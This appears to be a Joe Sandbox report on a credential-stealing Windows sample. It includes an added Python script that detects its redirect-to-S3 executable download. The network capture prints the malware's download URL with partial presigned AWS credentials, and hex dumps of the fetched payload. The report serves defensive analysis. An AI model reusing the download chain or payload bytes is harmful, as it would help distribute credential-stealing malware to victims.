lqLrt0DipR%2F%2F7Mms [TRUNCATED]
                                                                                                                                          Expires: Mon, 23 Dec 2024 16:21:19 GMT
                                                                                                                                          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                          X-Used-Mesh: False
                                                                                                                                          Vary: Accept-Language, Origin
                                                                                                                                          Content-Language: en
                                                                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                          X-Dc-Location: Micros-3
                                                                                                                                          X-Served-By: 4823d023cb17
                                                                                                                                          X-Version: c9b3998323c0
                                                                                                                                          X-Static-Version: c9b3998323c0
                                                                                                                                          X-Request-Count: 1936
                                                                                                                                          X-Render-Time: 0.06981706619262695
                                                                                                                                          X-B3-Traceid: b020879d11c74f73b45242478fab90df
                                                                                                                                          X-B3-Spanid: 41c9f72dd5ea486d
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                                                                          X-Usage-Quota-Remaining: 998931.367
                                                                                                                                          X-Usage-Request-Cost: 1088.77
                                                                                                                                          X-Usage-User-Time: 0.030092
                                                                                                                                          X-Usage-System-Time: 0.002571
                                                                                                                                          X-Usage-Input-Ops: 0
                                                                                                                                          X-Usage-Output-Ops: 0
                                                                                                                                          Age: 0
                                                                                                                                          X-Cache: MISS
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-Xss-Protection: 1; mode=block
                                                                                                                                          Atl-Traceid: b020879d11c74f73b45242478fab90df
                                                                                                                                          Atl-Request-Id: b020879d-11c7-4f73-b452-42478fab90df
                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                          Server-Timing: atl-edge;dur=180,atl-edge-internal;dur=3,atl-edge-upstream;dur=178,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49783 | 52.217.75.84 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:22 UTC | 1354 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3 [TRUNCATED]
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
2024-12-23 16:21:22 UTC | 554 | IN | HTTP/1.1 200 OK
                                                                                                                                          x-amz-id-2: hSQ9Tr5lVqWLUis8TXS32D6VNWBd9YPxVlUI1QbmkijFy/udvus+P2RcZ5B4uWMSNgH9uvBmeMc=
                                                                                                                                          x-amz-request-id: 8E1XVE8D7TJ6E3F5
                                                                                                                                          Date: Mon, 23 Dec 2024 16:21:23 GMT
                                                                                                                                          Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                          ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                          x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                          Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                          Content-Length: 1325507
                                                                                                                                          Server: AmazonS3
                                                                                                                                          Connection: close
2024-12-23 16:21:22 UTC | 16384 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
2024-12-23 16:21:22 UTC | 470 | IN | Data Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
2024-12-23 16:21:22 UTC | 16384 | IN | Data Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
2024-12-23 16:21:22 UTC | 1024 | IN | Data Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
2024-12-23 16:21:22 UTC | 16384 | IN | Data Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
2024-12-23 16:21:22 UTC | 1024 | IN | Data Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
2024-12-23 16:21:22 UTC | 1749 | IN | Data Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
2024-12-23 16:21:22 UTC | 16384 | IN | Data Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
2024-12-23 16:21:22 UTC | 1024 | IN | Data Raw: 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5 cf fb d0 f1 3b 9e a0 da 47 87 50 21 1b 80 74 df 40 4a ce cc
Data Ascii: |Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S;GP!t@J
2024-12-23 16:21:22 UTC | 16384 | IN | Data Raw: f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69 6c 0e f0 1e 6d f3 65 43 97 63 00 ac 8c 80 95 09 d0 c5 1f 88
Data Ascii: zRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e6N<DilmeCc
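The two hops captured above are the pattern a triage script has to recognise: session 8 is a GET on a bitbucket.org "downloads" path answered with a 302 whose Location is a presigned bbuseruploads.s3.amazonaws.com URL, and session 9 is the 200 from S3 with Content-Type application/x-msdownload and a body that starts with an MZ header. The Python below is an added example and is not part of the Joe Sandbox report. Its inputs are constructed from the values shown on this page: the request and response headers of both hops (the x-amz-security-token value is truncated on the page and is left out) and the first 255 bytes of the body taken from the first "Data Raw" line of session 9. It flags the redirect-to-presigned-storage executable fetch and the bare Chrome User-Agent sent without any Accept headers, then validates the DOS and PE signatures and pulls the fields needed to confirm the body is a PE32 image for IMAGE_FILE_MACHINE_I386.

```python
"""Triage of a redirect-to-presigned-S3 executable download, plus a check
that the returned body really is a PE image. Added example; inputs are
constructed from the headers and first bytes shown in the sandbox report."""
import re
import struct
from urllib.parse import parse_qs, urlparse

# Constructed from session 8 (request headers and the 302 response). The
# report truncates the x-amz-security-token value, so it is omitted here.
HOP1 = {
    "request_headers": {
        "Connection": "Keep-Alive",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
        "Host": "bitbucket.org",
    },
    "status": 302,
    "headers": {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Length": "0",
        "Location": "https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc"
                    "/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe"
                    "?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22"
                    "&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D",
    },
}
# Constructed from session 9 (the 200 response from S3).
HOP2 = {
    "status": 200,
    "headers": {
        "Content-Disposition": 'attachment; filename="FormattingCharitable.exe"',
        "Content-Type": "application/x-msdownload",
        "Content-Length": "1325507",
        "Server": "AmazonS3",
    },
}
# First 255 bytes of the body, from the first "Data Raw" line of session 9.
FIRST_CHUNK = bytes.fromhex(
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00"                 # IMAGE_DOS_HEADER
    " b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
    + " 00" * 28 + " d0 00 00 00"                                    # e_lfanew = 0xd0
    " 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21"                     # DOS stub
    " 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e"
    " 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24" + " 00" * 7
    + " 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38"  # Rich header
    " 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38"
    " 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38"
    + " 00" * 8
    + " 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01"  # PE\0\0 + IMAGE_FILE_HEADER
    " 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00"      # start of IMAGE_OPTIONAL_HEADER
)

EXE_MIME_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                  "application/vnd.microsoft.portable-executable"}


def classify_download_chain(hop1: dict, hop2: dict) -> list:
    """Return sorted indicator names for a redirect-to-presigned-storage executable fetch."""
    findings = []
    req = hop1.get("request_headers", {})
    # A real Chrome request carries Accept, Accept-Encoding and Accept-Language;
    # a Chrome User-Agent with none of them is a loader borrowing the string.
    if "Chrome/" in req.get("User-Agent", "") and not any(
            h in req for h in ("Accept", "Accept-Encoding", "Accept-Language")):
        findings.append("browser_ua_without_browser_headers")
    if hop1["status"] in (301, 302, 303, 307, 308):
        loc = urlparse(hop1["headers"].get("Location", ""))
        query = parse_qs(loc.query)
        # Presigned S3 (SigV2 style) URLs carry AWSAccessKeyId and Signature.
        if (loc.hostname or "").endswith(".s3.amazonaws.com") and \
                {"AWSAccessKeyId", "Signature"}.issubset(query):
            findings.append("redirect_to_presigned_s3")
        if loc.path.lower().endswith(".exe"):
            findings.append("exe_in_redirect_path")
    if hop2["status"] == 200:
        ctype = hop2["headers"].get("Content-Type", "").split(";")[0].strip().lower()
        if ctype in EXE_MIME_TYPES:
            findings.append("executable_mime")
        m = re.search(r'filename="?([^";]+)"?', hop2["headers"].get("Content-Disposition", ""))
        if m and m.group(1).lower().endswith(".exe"):
            findings.append("attachment_named_exe")
    return sorted(findings)


def parse_pe_header(data: bytes) -> dict:
    """Validate the MZ and PE signatures and return the triage-relevant fields.
    Raises ValueError for anything that is not the prefix of a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    machine, nsections, timestamp, _symtab, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # IMAGE_OPTIONAL_HEADER follows the 20-byte file header
    if opt + 20 > len(data):
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]          # 0x10b = PE32, 0x20b = PE32+
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,                  # 0x14c = IMAGE_FILE_MACHINE_I386
        "number_of_sections": nsections,
        "timestamp": timestamp,
        "size_of_optional_header": opt_size,
        "characteristics": characteristics,  # bit 0x0100 = IMAGE_FILE_32BIT_MACHINE
        "magic": magic,
        "entry_point": entry_point,
        "is_pe32": magic == 0x10B and bool(characteristics & 0x0100),
    }


def triage(hop1: dict, hop2: dict, first_chunk: bytes) -> dict:
    """Combine the header indicators with the PE check on the first body chunk."""
    result = {"indicators": classify_download_chain(hop1, hop2)}
    try:
        result["pe"] = parse_pe_header(first_chunk)
        result["indicators"] = sorted(result["indicators"] + ["body_is_pe"])
    except ValueError as exc:
        result["pe_error"] = str(exc)
    return result


if __name__ == "__main__":
    out = triage(HOP1, HOP2, FIRST_CHUNK)
    print("indicators:", ", ".join(out["indicators"]))
    pe = out["pe"]
    print(f"PE: machine=0x{pe['machine']:x} sections={pe['number_of_sections']} "
          f"entry=0x{pe['entry_point']:x} pe32={pe['is_pe32']}")
```

The header checks are deliberately narrow: the S3 test keys on the AWSAccessKeyId and Signature query parameters rather than on the bucket name, so it also fires for presigned URLs on other buckets, and the MIME set covers the three types S3 and common web servers use for Windows executables. The PE parser stops at the fields it needs; everything past AddressOfEntryPoint is outside the 255 bytes shown in the capture, and a full section-table parse would need the whole 1,325,507-byte body.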


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:11:20:52
                                                                                                                                          Start date:23/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\OtHVIQ2ge4.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\OtHVIQ2ge4.exe"
                                                                                                                                          Imagebase:0x570000
                                                                                                                                          File size:2'976'256 bytes
                                                                                                                                          MD5 hash:4BA0641B1F9224605DF854C9BAAA5DCF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:11:21:25
                                                                                                                                          Start date:23/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936
                                                                                                                                          Imagebase:0xa0000
                                                                                                                                          File size:483'680 bytes
                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

Memory Dump Source
• Source File: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_16e9000_OtHVIQ2ge4.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9e743b0d27bd3fcd38af1bc187d7cab3c754e2763f42698345e6f93f9ea8ac8
